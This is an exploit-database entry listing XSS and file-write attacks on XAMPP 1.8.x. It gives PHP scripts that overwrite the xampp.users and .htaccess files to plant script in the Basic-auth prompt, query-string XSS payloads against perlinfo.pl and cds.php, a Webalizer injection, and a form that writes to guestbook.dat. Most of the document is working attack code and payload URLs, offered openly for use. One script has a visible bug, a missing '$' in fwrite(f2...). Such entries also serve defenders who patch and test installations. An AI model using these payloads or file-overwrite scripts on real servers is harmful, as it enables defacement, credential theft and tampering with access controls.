XAMPP 1.8.x Multiple Vulnerabilities

2014-10-06T00:00:00
ID 1337DAY-ID-22729
Type zdt
Reporter DevilScreaM
Modified 2014-10-06T00:00:00

Description

Exploit for multiple platform in category remote exploits

                                        
                                            #Exploit Name : XAMPP 1.8.x Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 6 October 2014
#Vendor : http://bitnami.com
#Version : 1.8.x or Higher Version
#Operating System : Windows / Linux
#Vulnerability : Cross Site Scripting / Write File
#Type : #WebApps #Application
#Tested : Windows 7 64 Bit
#Thanks : Newbie-Security, Indonesian Hacker Team, Indonesia Coder Team, Indonesia Security Team


Cross Site Scripting at perlinfo.pl #1

Perl Version : 5.16.3

Script For Exploit

For Localhost

<?php
$xss  = "<script>alert('Tested by DevilScreaM')</script>:";
$f =@fopen ('C:\xampp\security\xampp.users','w');
fwrite($f , $xss);

$htcs  = 'AuthName "Username = your Script XSS"
AuthType Basic
AuthUserFile "C:\xampp\security\xampp.users"
require valid-user';
$f1 =@fopen ('C:\xampp\htdocs\xampp\.htaccess','w');
fwrite($f1 , $htcs);
?>

<script>
window.location = "http://127.0.0.1/xampp/perlinfo.pl"
</script>


==================================================================

For Site

<?php
$xss  = "<script>alert('Tested by DevilScreaM')</script>:";
$f =@fopen ('my.users','w');
fwrite($f , $xss);

$htcs  = 'AuthName "Username = your Script XSS"
AuthType Basic
AuthUserFile "my.users"
require valid-user';
$f1 =@fopen ('.htaccess','w');
fwrite($f1 , $htcs);

$pl = '#!"perl\bin\perl.exe"

use HTML::Perlinfo;
use CGI qw(header);

$q = new CGI;
print $q->header;

$p = new HTML::Perlinfo;
$p->info_general;
$p->info_variables;
$p->info_modules;
$p->info_license;';
$f2 =@fopen ('perlinfo.pl','w');
fwrite(f2 , $pl);
?>

<script>
window.location = "http://site.com/perlinfo.pl"
</script>

==================================================================

Save Script C:\xampp\htdocs\xss.php


Open Browser and Running http://127.0.0.1/xss.php
You Will Redirect to http://127.0.0.1/xampp/perlinfo.pl

Auth Login
Username : <script>alert('Tested by DevilScreaM')</script>
Password : 


===================================================================

Cross Site Scripting at perlinfo.pl Query String #2

Exploit :

http://127.0.0.1/xampp/perlinfo.pl?[XSS]
http://127.0.0.1/xampp/perlinfo.pl?[XSS]=[XSS]

Example

http://127.0.0.1/xampp/perlinfo.pl?<script>alert('DevilScreaM')</script>=<script>alert('Newbie-Security')</script>


====================================================================

Cross Site Scripting at http://127.0.0.1/xampp/perlinfo.pl #3


Exploit :

1. Go To Directory C:\xampp\apache\conf\
2. Edit File httpd.conf
3. Go To Line 209

Edit ServerAdmin postmaster@localhost to

ServerAdmin [YOUR XSS]

Example :

ServerAdmin <h1>DevilScreaM</h1>


4. Save File

5. See your XSS at

http://127.0.0.1/xampp/perlinfo.pl


====================================================================



Cross Site Scripting at http://127.0.0.1/Webalizer/


Script for Exploit :


<?php
$xss  = "<script>alert('Tested by DevilScreaM')</script>:";
$f =@fopen ('C:\xampp\security\xampp.users','w');
fwrite($f , $xss);

?>

<script>
window.location = "http://127.0.0.1/webalizer/usage_[YEARS][MONTH].html"
</script>

Information :
usage_[YEARS][MONTH].html => usage_201410.html

====================================================================

Save Script Webalizer.php


Command

@echo off
C:\xampp\webalizer\webalizer.exe -c C:\xampp\webalizer\webalizer.conf

PHP

<?php
 
$webalizer = "C:\xampp\webalizer\webalizer.bat";
	
system($webalizer);

?>

=====================================================================

Save Script webalizer.cmd or webalizer_run.php


Run Webalizer.cmd and Waiting Process

Result

http://127.0.0.1/webalizer/usage_[years][month].html

Example

http://127.0.0.1/webalizer/usage_201410.html


==================================================================


Cross Site Scripting at cds.php

Exploit :

http://127.0.0.1/xampp/cds.php?interpret=[XSS]

Example :

http://127.0.0.1/xampp/cds.php?interpret=<script>alert('Tested by> DevilScreaM')</script>


====================================================================



Write File Vulnerability

Script to Exploit :


<form action='http://127.0.0.1/xampp/guestbook-en.pl' method='get'>
<table border='0' cellpadding='0' cellspacing='0'>
<tr><td>TEXT:</td>
<td><input type='text' size='30' value='Tested by DevilScreaM' name='f_name'></td></tr>
<tr><td></td><td><input type='submit' value='WRITE'></td></tr>
</table></form>
</br></br>
<a href="http://127.0.0.1/xampp/guestbook.dat"><b>Result</b></a>

==================================================================

Save Script with extension .html

Open Script and Click Write or Change Text

Result

http://127.0.0.1/xampp/guestbook.dat

#  0day.today [2016-04-19]  #